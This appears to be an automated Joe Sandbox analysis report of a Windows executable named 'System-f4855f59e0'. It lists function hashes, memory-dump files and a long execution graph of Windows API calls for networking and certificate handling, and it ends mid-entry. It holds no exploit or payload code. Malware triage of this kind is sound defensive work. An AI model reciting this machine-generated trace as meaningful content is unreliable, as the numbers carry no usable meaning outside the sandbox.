                                                                • Instruction ID: 76649d6a6f8375afc5c2317a7bc293621e922e4c395e7ed0baa61350cbab886f
                                                                • Opcode Fuzzy Hash: 46e15a95bb962e2dd417d488284b3fd0ee0fd895637bd75e109c08b0388ab4dc
                                                                • Instruction Fuzzy Hash: 9221D82360E7C485E721D715E4447EEB7A1EBAAB88F588131DA8C47B89DF3CD846C700
                                                                Function 00007FF6A54A1F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Objectshared_ptr
                                                                • String ID: 0
                                                                • API String ID: 1638491571-4108050209
                                                                • Opcode ID: f0e70b0fbdc1e3320b1f4b6d5346711075dcbb57718dc63cfcd297f1e3befe2f
                                                                • Instruction ID: 025d0a10e782524aef9c12ef56e32d8a0b55644df6d60a5e8dc149e1b3dfb3be
                                                                • Opcode Fuzzy Hash: f0e70b0fbdc1e3320b1f4b6d5346711075dcbb57718dc63cfcd297f1e3befe2f
                                                                • Instruction Fuzzy Hash: 24313A7251D6C685EB60DB10E0947AFB7A0F785B88F400136E68E87A69DF3CD944CF40
                                                                Function 00007FF6A54DE318 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE368
                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A54DDB83), ref: 00007FF6A54DE3A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: cecfb8893822065352edba2dbd42223096cc233a49940044e064f560193aab1a
                                                                • Instruction ID: 0c6fc8de3e629a3d212fc6307805b85bc755196f6456033dc09981459fd5025d
                                                                • Opcode Fuzzy Hash: cecfb8893822065352edba2dbd42223096cc233a49940044e064f560193aab1a
                                                                • Instruction Fuzzy Hash: E0115B32619B8082EB60CB15E44026977E5FB89F98F584231EE8D47754DF3CC9618B00
                                                                Function 00007FF6A54A3600 Relevance: 5.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CloseHandleHeap$FreeProcess
                                                                • String ID:
                                                                • API String ID: 4176491614-0
                                                                • Opcode ID: 4ffdf59a764e06fd56a93af4675fc0a0a6384d06bfcaaf876b97e7f445c73c96
                                                                • Instruction ID: f4f63b3b2174c6dedef56357943cf46895613d6fc78f62f315be2f905a97d72b
                                                                • Opcode Fuzzy Hash: 4ffdf59a764e06fd56a93af4675fc0a0a6384d06bfcaaf876b97e7f445c73c96
                                                                • Instruction Fuzzy Hash: 6B01FF25929B8181D694CB15E48832963B0FBCAF65F405235E66F837F4DF3CD885C700

                                                                Execution Graph

                                                                Execution Coverage:2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:3.8%
                                                                Total number of Nodes:1663
                                                                Total number of Limit Nodes:70
                                                                execution_graph 84741 173d03bd26c 84742 173d03bd27d __std_exception_copy 84741->84742 84743 173d03bd2ce 84742->84743 84744 173d03bd2b2 HeapAlloc 84742->84744 84748 173d03bb3fc EnterCriticalSection LeaveCriticalSection __std_exception_copy 84742->84748 84749 173d03bd24c 11 API calls __std_exception_copy 84743->84749 84744->84742 84745 173d03bd2cc 84744->84745 84748->84742 84749->84745 84750 173d01b3990 84751 173d01b39c3 84750->84751 84752 173d01b39b8 84750->84752 84751->84752 84776 173d0164bb0 84751->84776 84755 173d01b3a4c 84757 173d01b3ad6 84755->84757 84758 173d01b3a58 84755->84758 84756 173d01b3a31 84811 173d01b57e0 16 API calls 84756->84811 84763 173d01b3af0 84757->84763 84764 173d01b3ada 84757->84764 84761 173d01b3a80 84758->84761 84762 173d01b3a5f 84758->84762 84760 173d01b3a42 84760->84755 84766 173d01b3b47 84760->84766 84773 173d01b3a6e 84761->84773 84813 173d0164a70 14 API calls 84761->84813 84812 173d0164a70 14 API calls 84762->84812 84767 173d01b3b1b 84763->84767 84770 173d01b3b05 84763->84770 84814 173d0164a70 14 API calls 84764->84814 84769 173d0164bb0 14 API calls 84766->84769 84795 173d01b1420 84767->84795 84769->84752 84815 173d0164a70 14 API calls 84770->84815 84773->84766 84816 173d01a3b60 84773->84816 84777 173d0164d03 84776->84777 84780 173d0164bb9 84776->84780 84777->84755 84777->84756 84778 173d0164cf3 84824 173d01b9e10 84778->84824 84780->84778 84781 173d0164c50 84780->84781 84819 173d0184eb0 84780->84819 84783 173d0164c83 84781->84783 84784 173d0164c71 84781->84784 84786 173d0184eb0 8 API calls 84783->84786 84785 173d0184eb0 8 API calls 84784->84785 84787 173d0164c81 84785->84787 84786->84787 84822 173d0185060 8 API calls 84787->84822 84789 173d0164cb7 84790 173d0164d0d 84789->84790 84791 173d0164cde 84789->84791 84833 173d01b9f38 8 API calls 84790->84833 84823 173d0164980 fwrite fwrite 84791->84823 84794 173d0164d12 84797 173d01b144e 84795->84797 84796 173d01b1457 84796->84773 84797->84796 84807 173d01b148e 84797->84807 84837 173d015cfb0 84797->84837 84799 173d015cfb0 10 API calls 84799->84807 84801 173d01b1516 84801->84796 84966 173d01b20b0 66 API calls 84801->84966 84807->84796 84807->84799 84807->84801 84808 173d01b155c WSAGetLastError 84807->84808 84810 173d01b1552 84807->84810 84898 173d01b1a60 84807->84898 84956 173d0192690 84807->84956 84967 173d0164a70 14 API calls 84808->84967 84810->84796 84968 173d0164a70 14 API calls 84810->84968 84811->84760 84812->84773 84813->84773 84814->84773 84815->84773 84817 173d01a3bad GetTickCount 84816->84817 84818 173d01a3b72 QueryPerformanceCounter 84816->84818 84817->84766 84818->84766 84834 173d01850f0 8 API calls 84819->84834 84821 173d0184ee3 84821->84781 84822->84789 84823->84778 84825 173d01b9e19 84824->84825 84826 173d01b9e64 IsProcessorFeaturePresent 84825->84826 84827 173d01b9e24 84825->84827 84828 173d01b9e7c 84826->84828 84827->84777 84835 173d01ba05c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 84828->84835 84830 173d01b9e8f 84836 173d01b9e30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84830->84836 84833->84794 84834->84821 84835->84830 84838 173d015cfe0 84837->84838 84839 173d015cfe5 84838->84839 84840 173d01a3b60 2 API calls 84838->84840 84841 173d01b9e10 8 API calls 84839->84841 84840->84839 84842 173d015d0c0 84841->84842 84842->84810 84843 173d01b15d0 84842->84843 84844 173d01b1613 84843->84844 84969 173d01ac700 84844->84969 84847 173d01b165e 84849 173d01b16ae 84847->84849 84850 173d01b1664 GetModuleHandleW GetProcAddress 84847->84850 84854 173d01ac700 21 API calls 84849->84854 84859 173d01b16bf 84849->84859 84850->84849 84851 173d01b1686 84850->84851 84852 173d01ac700 21 API calls 84851->84852 84853 173d01b16a6 84852->84853 84853->84849 84855 173d01b16e3 84854->84855 84856 173d01b1a1c 84855->84856 84855->84859 85029 173d0164a70 14 API calls 84856->85029 84863 173d01b1719 84859->84863 85000 173d01b53d0 17 API calls 84859->85000 84860 173d01b17ba 84864 173d01b9e10 8 API calls 84860->84864 84869 173d01b1770 84863->84869 84988 173d01b0380 84863->84988 84866 173d01b1a3f 84864->84866 84865 173d01b1754 85001 173d01626d0 MultiByteToWideChar malloc MultiByteToWideChar free 84865->85001 84866->84807 84868 173d01b175c 84868->84860 84868->84869 84870 173d01b1785 84869->84870 84871 173d0164b60 18 API calls 84869->84871 84872 173d01b1839 calloc 84870->84872 85002 173d01b4040 memmove 84870->85002 84871->84870 84876 173d01b18c3 84872->84876 84877 173d01b18aa 84872->84877 84875 173d01b17a3 84878 173d01b17ab 84875->84878 84879 173d01b17c4 memmove 84875->84879 84883 173d01b1926 free 84876->84883 84892 173d01b199d 84876->84892 85005 173d0164a70 14 API calls 84877->85005 85003 173d0164a70 14 API calls 84878->85003 84882 173d01b17e3 84879->84882 85004 173d01b4100 memmove 84882->85004 85006 173d019e4c0 GetLastError _errno 84883->85006 84886 173d01b1826 84888 173d0164b60 18 API calls 84886->84888 84888->84872 84889 173d01b1953 84893 173d01b195b 84889->84893 84894 173d01b1971 84889->84894 84890 173d01b1987 85027 173d0164a70 14 API calls 84890->85027 84892->84860 85028 173d0164a70 14 API calls 84892->85028 85025 173d0164a70 14 API calls 84893->85025 85026 173d0164a70 14 API calls 84894->85026 84899 173d01b1a9e 84898->84899 84900 173d01b1b0b 84899->84900 84901 173d01b1ae3 malloc 84899->84901 84924 173d01b2061 84899->84924 84902 173d01b1b3e 84900->84902 84903 173d01b1b14 malloc 84900->84903 84901->84900 84901->84924 84904 173d01b1b51 realloc 84902->84904 84907 173d01b1baa 84902->84907 84903->84902 84903->84924 84905 173d01b1b66 84904->84905 84904->84907 85040 173d0164a70 14 API calls 84905->85040 84913 173d01b1de2 84907->84913 84923 173d01b1bfa 84907->84923 84907->84924 84908 173d01b1c0a malloc 84911 173d01b1c9e memmove 84908->84911 84908->84924 84909 173d01b1b75 84910 173d01b9e10 8 API calls 84909->84910 84912 173d01b1b99 84910->84912 84915 173d01b1cff free 84911->84915 84912->84807 85041 173d0164a70 14 API calls 84913->85041 84915->84923 84915->84924 84916 173d01b1df1 85042 173d0164a70 14 API calls 84916->85042 84917 173d01b1fd2 84918 173d019e4c0 17 API calls 84917->84918 84917->84924 84925 173d01b1ff2 84918->84925 84920 173d01b204b 85053 173d0164a70 14 API calls 84920->85053 84922 173d01b2035 85052 173d0164a70 14 API calls 84922->85052 84923->84908 84923->84916 84923->84917 84930 173d01b1de0 84923->84930 84931 173d01b1dbd memmove 84923->84931 84925->84920 84925->84922 84926 173d01b201f 84925->84926 85050 173d0164a70 14 API calls 84925->85050 85051 173d0164a70 14 API calls 84926->85051 84930->84924 84932 173d01b1f8b 84930->84932 84935 173d01b1f3e 84930->84935 84938 173d01b1eb1 84930->84938 84931->84923 84931->84930 84932->84924 84933 173d01b1fb3 84932->84933 85048 173d01b2470 117 API calls 84932->85048 84933->84924 84934 173d01b1fc2 84933->84934 85049 173d01b28a0 59 API calls 84934->85049 84939 173d019e4c0 17 API calls 84935->84939 84941 173d01b1f3c 84938->84941 84943 173d01b1ec7 memset 84938->84943 84942 173d01b1f52 84939->84942 84940 173d01b1fcd 84940->84917 84945 173d01b1f6e CertFreeCertificateContext 84941->84945 84946 173d01b1f74 84941->84946 85046 173d0164a70 14 API calls 84942->85046 84949 173d01b1eec 84943->84949 84945->84946 84946->84932 85047 173d0164a70 14 API calls 84946->85047 84948 173d01b1f2d 85045 173d0164a70 14 API calls 84948->85045 84949->84941 84949->84948 84950 173d01b1f08 84949->84950 85043 173d01b4560 53 API calls _vfwprintf_l 84950->85043 84953 173d01b1f16 84953->84941 85044 173d0164a70 14 API calls 84953->85044 84955 173d01b1f2b 84955->84941 84957 173d01926bd 84956->84957 84959 173d01926d4 84956->84959 84958 173d01926c7 84957->84958 84957->84959 85054 173d01927f0 WSASetLastError Sleep 84958->85054 85055 173d0192110 84959->85055 84962 173d01926cf 84965 173d0192736 84962->84965 84963 173d01b9e10 8 API calls 84964 173d01927db 84963->84964 84964->84807 84965->84963 84966->84796 84967->84796 84968->84796 84970 173d01ac73f GetModuleHandleA GetProcAddress 84969->84970 84977 173d01ac76a 84969->84977 84970->84977 84971 173d01ac7c3 memset 84972 173d01ac7f6 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask 84971->84972 84974 173d01ac851 VerSetConditionMask 84972->84974 84975 173d01ac868 84972->84975 84974->84975 84978 173d01ac87f RtlVerifyVersionInfo 84975->84978 84979 173d01ac88a VerifyVersionInfoW 84975->84979 84976 173d01ac79b 84980 173d01b9e10 8 API calls 84976->84980 84977->84971 84977->84976 84985 173d01ac896 84978->84985 84979->84985 84981 173d01ac931 84980->84981 84981->84847 84996 173d0164b60 84981->84996 84982 173d01ac8cc VerSetConditionMask 84983 173d01ac901 VerifyVersionInfoW 84982->84983 84984 173d01ac8f6 RtlVerifyVersionInfo 84982->84984 84983->84976 84984->84976 84985->84976 84985->84982 84986 173d01ac700 8 API calls 84985->84986 84987 173d01ac8c8 84986->84987 84987->84976 84987->84982 84990 173d01b03c4 84988->84990 84989 173d0164b60 18 API calls 84991 173d01b0485 84989->84991 84990->84989 85030 173d0164a70 14 API calls 84991->85030 84993 173d01b134d 84994 173d01b9e10 8 API calls 84993->84994 84995 173d01b1361 84994->84995 84995->84860 84995->84865 84997 173d0164b65 84996->84997 84998 173d0164ba0 84996->84998 84997->84998 85031 173d0164eb0 18 API calls 84997->85031 84998->84847 85000->84863 85001->84868 85002->84875 85003->84860 85004->84886 85005->84860 85007 173d019e507 85006->85007 85023 173d019e500 85006->85023 85009 173d019e533 85007->85009 85012 173d019e9d1 85007->85012 85008 173d01b9e10 8 API calls 85010 173d019ea3e 85008->85010 85032 173d019f5b0 85009->85032 85010->84889 85010->84890 85013 173d0184eb0 8 API calls 85012->85013 85015 173d019e58d 85013->85015 85018 173d019e9fb _errno 85015->85018 85016 173d019e9eb 85019 173d0184eb0 8 API calls 85016->85019 85017 173d019e573 85020 173d0184eb0 8 API calls 85017->85020 85021 173d019ea0e _errno 85018->85021 85022 173d019ea17 GetLastError 85018->85022 85019->85018 85020->85015 85021->85022 85022->85023 85024 173d019ea22 SetLastError 85022->85024 85023->85008 85024->85023 85025->84860 85026->84860 85027->84860 85028->84860 85029->84860 85030->84993 85031->84998 85033 173d019f5de FormatMessageW 85032->85033 85037 173d019f5d7 85032->85037 85034 173d019f61e wcstombs 85033->85034 85035 173d019f63f strchr 85033->85035 85036 173d019f636 85034->85036 85035->85037 85036->85035 85038 173d01b9e10 8 API calls 85037->85038 85039 173d019e561 85038->85039 85039->85016 85039->85017 85040->84909 85041->84916 85042->84930 85043->84953 85044->84955 85045->84941 85046->84941 85047->84932 85048->84933 85049->84940 85050->84926 85051->84922 85052->84920 85053->84924 85054->84962 85056 173d0192164 85055->85056 85057 173d019214a 85055->85057 85058 173d01924c5 85056->85058 85059 173d01924ae Sleep 85056->85059 85060 173d0192173 WSASetLastError 85056->85060 85057->85056 85070 173d019218d 85057->85070 85059->85058 85061 173d019231f 85060->85061 85062 173d01b9e10 8 API calls 85061->85062 85063 173d0192340 85062->85063 85063->84965 85064 173d01922f8 85066 173d019237c 85064->85066 85068 173d0192307 85064->85068 85065 173d0192314 WSASetLastError 85065->85061 85067 173d0192389 select 85066->85067 85069 173d019230c 85067->85069 85068->85069 85072 173d0192360 Sleep 85068->85072 85073 173d0192353 WSASetLastError 85068->85073 85071 173d01923d0 85069->85071 85078 173d01923ed 85069->85078 85070->85064 85070->85065 85071->85061 85074 173d01923d9 WSAGetLastError 85071->85074 85072->85069 85073->85069 85074->85061 85075 173d01924a7 85075->85059 85076 173d0192447 __WSAFDIsSet 85077 173d0192465 __WSAFDIsSet 85076->85077 85076->85078 85077->85078 85078->85075 85078->85076 85078->85077 85079 173d01afed0 85082 173d0164840 85079->85082 85081 173d01afed9 85083 173d01648d5 85082->85083 85084 173d0164852 85082->85084 85083->85081 85085 173d01ac700 21 API calls 85084->85085 85086 173d0164872 85085->85086 85091 173d019fc30 GetModuleHandleW 85086->85091 85088 173d016488b 85089 173d0164897 GetProcAddressForCaller 85088->85089 85090 173d01648ac 85088->85090 85089->85090 85090->85081 85092 173d019fc52 85091->85092 85093 173d019fc5a GetProcAddress wcspbrk 85091->85093 85092->85088 85094 173d019fcbc 85093->85094 85095 173d019fc87 LoadLibraryW 85093->85095 85097 173d019fcc1 GetProcAddress 85094->85097 85098 173d019fcf3 GetSystemDirectoryW 85094->85098 85095->85094 85097->85098 85099 173d019fcd6 85097->85099 85100 173d019fd0d malloc 85098->85100 85101 173d019fdbc 85098->85101 85099->85098 85103 173d019fdae free 85100->85103 85104 173d019fd40 GetSystemDirectoryW 85100->85104 85101->85088 85103->85101 85104->85103 85105 173d019fd50 85104->85105 85106 173d019fda5 LoadLibraryW 85105->85106 85107 173d019fd98 85105->85107 85106->85107 85107->85103 85108 173d015c530 85109 173d015c557 85108->85109 85119 173d015c569 85108->85119 85110 173d015c608 85112 173d015c5f3 85114 173d0164bb0 14 API calls 85112->85114 85113 173d015c621 calloc 85115 173d015c8a6 85113->85115 85121 173d015c646 85113->85121 85114->85110 85116 173d015c8ab free free 85115->85116 85116->85110 85119->85110 85119->85112 85119->85113 85120 173d015c8cc 85119->85120 85119->85121 85127 173d019bb90 calloc 85119->85127 85128 173d01b4270 6 API calls 85119->85128 85131 173d01b41c0 6 API calls 85119->85131 85132 173d0164a70 14 API calls 85120->85132 85121->85110 85121->85116 85121->85119 85126 173d0158360 calloc 85121->85126 85129 173d017e8b0 calloc calloc free 85121->85129 85130 173d0154da0 calloc free calloc free 85121->85130 85126->85121 85127->85119 85128->85119 85129->85121 85130->85121 85131->85119 85132->85110 85133 173d015c0b0 85134 173d015c0f1 85133->85134 85136 173d015c0e6 85133->85136 85138 173d015c0fb 85134->85138 85164 173d015dd20 21 API calls 85134->85164 85135 173d01b9e10 8 API calls 85140 173d015c253 85135->85140 85136->85135 85138->85136 85147 173d015d570 85138->85147 85145 173d015c1a2 85145->85136 85146 173d0164bb0 14 API calls 85145->85146 85146->85136 85154 173d015d5d0 85147->85154 85148 173d01a3b60 2 API calls 85148->85154 85149 173d015c13a 85149->85136 85165 173d015d280 85149->85165 85150 173d015db9c 85150->85149 85151 173d0164bb0 14 API calls 85150->85151 85156 173d015dbc3 85151->85156 85152 173d015d709 WSASetLastError 85152->85154 85153 173d015dcbc 85181 173d0164a70 14 API calls 85153->85181 85154->85148 85154->85149 85154->85150 85154->85152 85154->85153 85158 173d0164b60 18 API calls 85154->85158 85160 173d015d0d0 21 API calls 85154->85160 85163 173d0164bb0 14 API calls 85154->85163 85179 173d01874f0 20 API calls 85154->85179 85155 173d0164bb0 14 API calls 85155->85156 85156->85155 85159 173d015dc0d 85156->85159 85158->85154 85180 173d0164a70 14 API calls 85159->85180 85160->85154 85163->85154 85164->85138 85166 173d015d2a4 85165->85166 85167 173d015d2bd 85165->85167 85168 173d015d2b4 free 85166->85168 85182 173d01588f0 free 85166->85182 85171 173d015d2de free 85167->85171 85174 173d015d2e7 85167->85174 85183 173d01588f0 free 85167->85183 85168->85167 85169 173d015c17b 85169->85145 85176 173d018ef80 85169->85176 85171->85174 85173 173d015d306 free 85173->85169 85174->85169 85174->85173 85184 173d01588f0 free 85174->85184 85177 173d01a3b60 2 API calls 85176->85177 85178 173d018efa3 85177->85178 85178->85145 85179->85154 85180->85149 85181->85149 85182->85168 85183->85171 85184->85173 85185 173d01b04a6 85186 173d01b04ae 85185->85186 85187 173d01ac700 21 API calls 85186->85187 85210 173d01b04dd 85186->85210 85187->85210 85188 173d01b0549 85189 173d01b091b calloc 85188->85189 85190 173d01b05b2 85188->85190 85199 173d01b0591 85188->85199 85191 173d01b093c 85189->85191 85192 173d01b0c22 85189->85192 85319 173d01626d0 MultiByteToWideChar malloc MultiByteToWideChar free 85190->85319 85324 173d0164a70 14 API calls 85191->85324 85197 173d01b1069 85192->85197 85202 173d01ac700 21 API calls 85192->85202 85195 173d01b07c5 85203 173d01b0975 85195->85203 85204 173d01b07dc CertOpenStore 85195->85204 85196 173d01b05b7 85200 173d01b05c3 wcschr 85196->85200 85311 173d01b096b 85196->85311 85205 173d01b10b0 85197->85205 85212 173d0164b60 18 API calls 85197->85212 85287 173d01b0ef7 85197->85287 85198 173d01b094b 85206 173d01b095b 85198->85206 85207 173d01b0955 CertFreeCertificateContext 85198->85207 85199->85195 85215 173d01b0796 85199->85215 85208 173d01b05dc wcsncmp 85200->85208 85209 173d01b0738 85200->85209 85201 173d01ac700 21 API calls 85201->85210 85211 173d01b0c5b 85202->85211 85217 173d01b09a3 85203->85217 85218 173d01b0998 free 85203->85218 85219 173d01b086b free CryptStringToBinaryW 85204->85219 85220 173d01b0804 85204->85220 85213 173d01b10b7 85205->85213 85263 173d01b10d0 85205->85263 85214 173d01b0960 CertCloseStore 85206->85214 85206->85311 85207->85206 85216 173d01b0607 wcsncmp 85208->85216 85292 173d01b05fc wcschr 85208->85292 85223 173d01b1300 85209->85223 85320 173d0162830 8 API calls 85209->85320 85210->85188 85210->85201 85221 173d01b05a6 85210->85221 85211->85197 85246 173d01b0c63 85211->85246 85212->85205 85331 173d0164a70 14 API calls 85213->85331 85214->85311 85321 173d0164a70 14 API calls 85215->85321 85226 173d01b0629 wcsncmp 85216->85226 85216->85292 85227 173d01b09ac fseek 85217->85227 85268 173d01b0a85 85217->85268 85218->85217 85229 173d01b08b1 85219->85229 85230 173d01b08c8 CertFindCertificateInStore 85219->85230 85322 173d0162780 WideCharToMultiByte malloc WideCharToMultiByte free 85220->85322 85335 173d0164a70 14 API calls 85221->85335 85222 173d01b9e10 8 API calls 85231 173d01b1361 85222->85231 85334 173d0164a70 14 API calls 85223->85334 85235 173d01b064b wcsncmp 85226->85235 85226->85292 85236 173d01b0a1d 85227->85236 85237 173d01b09cc ftell 85227->85237 85242 173d01b0c0d CertCloseStore 85229->85242 85243 173d01b08ba free 85229->85243 85244 173d01b0905 85230->85244 85245 173d01b08f7 free 85230->85245 85233 173d01b10eb strtol 85248 173d01b1101 strchr 85233->85248 85233->85263 85250 173d01b066a wcsncmp 85235->85250 85235->85292 85251 173d01b09db 85236->85251 85253 173d01b0a22 fseek 85236->85253 85237->85236 85237->85251 85238 173d01b0809 GetLastError 85323 173d0164a70 14 API calls 85238->85323 85241 173d01b06fa 85241->85209 85278 173d01b0716 _wcsdup 85241->85278 85242->85311 85243->85242 85244->85242 85256 173d01b090e 85244->85256 85245->85244 85259 173d01b0d42 strchr 85246->85259 85246->85287 85296 173d01b0d7a strncmp 85246->85296 85305 173d01b0da6 strncmp 85246->85305 85310 173d01b0dd7 strncmp 85246->85310 85314 173d01b0e0b strncmp 85246->85314 85315 173d01b0e8b 85246->85315 85317 173d01b0e3f strncmp 85246->85317 85318 173d01b0e89 85246->85318 85247 173d01b0765 85247->85223 85260 173d01b0771 85247->85260 85248->85263 85249 173d01b07c0 85277 173d01b0858 free 85249->85277 85249->85311 85264 173d01b0689 wcsncmp 85250->85264 85250->85292 85273 173d01b0a4e fclose 85251->85273 85274 173d01b09ec fread 85251->85274 85253->85251 85266 173d01b0a3a malloc 85253->85266 85254 173d01b131b free 85254->85221 85254->85311 85255 173d01b0ab9 malloc 85257 173d01b0ad3 85255->85257 85258 173d01b0b69 85255->85258 85256->85189 85269 173d01b0b0a 85257->85269 85270 173d01b0ad8 MultiByteToWideChar 85257->85270 85271 173d01b0b6e free 85258->85271 85272 173d01b0b77 85258->85272 85259->85246 85260->85199 85261 173d01b129f 85279 173d019e4c0 17 API calls 85261->85279 85261->85311 85262 173d01b1299 CertFreeCertificateContext 85262->85261 85263->85233 85267 173d01b11d4 strchr 85263->85267 85280 173d01b118c strncmp 85263->85280 85263->85287 85312 173d01b1155 strncmp 85263->85312 85275 173d01b06a8 wcsncmp 85264->85275 85264->85292 85265 173d01b0838 free 85265->85249 85276 173d01b0846 free 85265->85276 85266->85251 85267->85263 85267->85287 85268->85255 85268->85268 85295 173d01ac700 21 API calls 85269->85295 85270->85269 85271->85272 85281 173d01b0bc2 CertFindCertificateInStore 85272->85281 85282 173d01b0b80 GetLastError 85272->85282 85285 173d01b0a57 85273->85285 85274->85273 85283 173d01b0a06 fclose 85274->85283 85284 173d01b06c7 wcsncmp 85275->85284 85275->85292 85276->85249 85277->85311 85278->85204 85278->85209 85286 173d01b12b4 85279->85286 85280->85263 85293 173d01b11a6 strncmp 85280->85293 85281->85256 85291 173d01b0bf0 GetLastError 85281->85291 85288 173d01b0b93 85282->85288 85289 173d01b0ba9 85282->85289 85283->85285 85290 173d01b0a14 85283->85290 85284->85209 85284->85292 85325 173d0164a70 14 API calls 85285->85325 85333 173d0164a70 14 API calls 85286->85333 85287->85261 85287->85262 85326 173d0164a70 14 API calls 85288->85326 85327 173d0164a70 14 API calls 85289->85327 85290->85268 85328 173d0164a70 14 API calls 85291->85328 85292->85209 85292->85241 85293->85263 85301 173d01b11fd 85293->85301 85303 173d01b0b40 PFXImportCertStore free 85295->85303 85296->85246 85332 173d0164a70 14 API calls 85301->85332 85302 173d01b0a72 free 85302->85311 85303->85258 85304 173d01b0edc 85330 173d0164a70 14 API calls 85304->85330 85305->85246 85306 173d01b12c8 free 85306->85311 85307 173d01b0b9f 85307->85311 85310->85246 85311->85222 85312->85263 85314->85246 85329 173d0164a70 14 API calls 85315->85329 85317->85246 85317->85315 85318->85287 85318->85304 85319->85196 85320->85247 85321->85249 85322->85238 85323->85265 85324->85198 85325->85302 85326->85307 85327->85311 85328->85242 85329->85311 85330->85311 85331->85311 85332->85311 85333->85306 85334->85254 85335->85311 85336 173d0158cd0 85337 173d0158d0e 85336->85337 85341 173d0158d1b 85336->85341 85338 173d0158dd5 85339 173d0158e7b 85338->85339 85342 173d0158de0 85338->85342 85384 173d0159a80 8 API calls 85339->85384 85341->85337 85349 173d0154e50 85341->85349 85342->85337 85382 173d0159a80 8 API calls 85342->85382 85344 173d0158e52 85345 173d01a3b60 2 API calls 85344->85345 85346 173d0158e5c 85345->85346 85383 173d01a6810 18 API calls 85346->85383 85350 173d0154e70 85349->85350 85351 173d0154e81 85349->85351 85350->85338 85352 173d01a3b60 2 API calls 85351->85352 85353 173d0154e93 85352->85353 85354 173d0164bb0 14 API calls 85353->85354 85356 173d0154e9c 85353->85356 85355 173d0154ee2 85354->85355 85357 173d0154f29 85355->85357 85358 173d0154eec 85355->85358 85371 173d0154f91 85356->85371 85374 173d0154ea5 85356->85374 85376 173d0154fa7 85356->85376 85357->85356 85387 173d0155aa0 7 API calls 85357->85387 85385 173d0155aa0 7 API calls 85358->85385 85359 173d0164bb0 14 API calls 85362 173d015519c 85359->85362 85361 173d0155028 85389 173d0155aa0 7 API calls 85361->85389 85362->85338 85364 173d0154f0a 85364->85356 85386 173d01874f0 20 API calls 85364->85386 85365 173d015504d 85367 173d0164bb0 14 API calls 85365->85367 85368 173d0155124 85365->85368 85375 173d015508b 85367->85375 85370 173d0164bb0 14 API calls 85368->85370 85368->85374 85370->85374 85388 173d01557c0 17 API calls 85371->85388 85373 173d0155016 85378 173d0164bb0 14 API calls 85373->85378 85374->85359 85375->85368 85377 173d01550aa 85375->85377 85376->85361 85376->85365 85376->85373 85379 173d0155107 85376->85379 85390 173d01557c0 17 API calls 85377->85390 85378->85361 85391 173d01874f0 20 API calls 85379->85391 85382->85344 85383->85337 85384->85337 85385->85364 85386->85356 85387->85356 85388->85374 85389->85365 85390->85374 85391->85365 85392 173d015c8f0 85393 173d0164bb0 14 API calls 85392->85393 85394 173d015c91b 85393->85394 85395 173d015c943 85394->85395 85399 173d01b3940 85394->85399 85405 173d01b5f80 85399->85405 85401 173d01b3966 85402 173d015c937 85401->85402 85410 173d015c270 85401->85410 85404 173d01588f0 free 85402->85404 85404->85395 85406 173d01b5ff1 85405->85406 85407 173d01b5f96 85405->85407 85406->85401 85408 173d01b5fbc free free 85407->85408 85409 173d01b5fb6 free 85407->85409 85408->85401 85409->85408 85411 173d0164bb0 14 API calls 85410->85411 85412 173d015c29b 85411->85412 85413 173d015d280 4 API calls 85412->85413 85414 173d015c2a6 85413->85414 85415 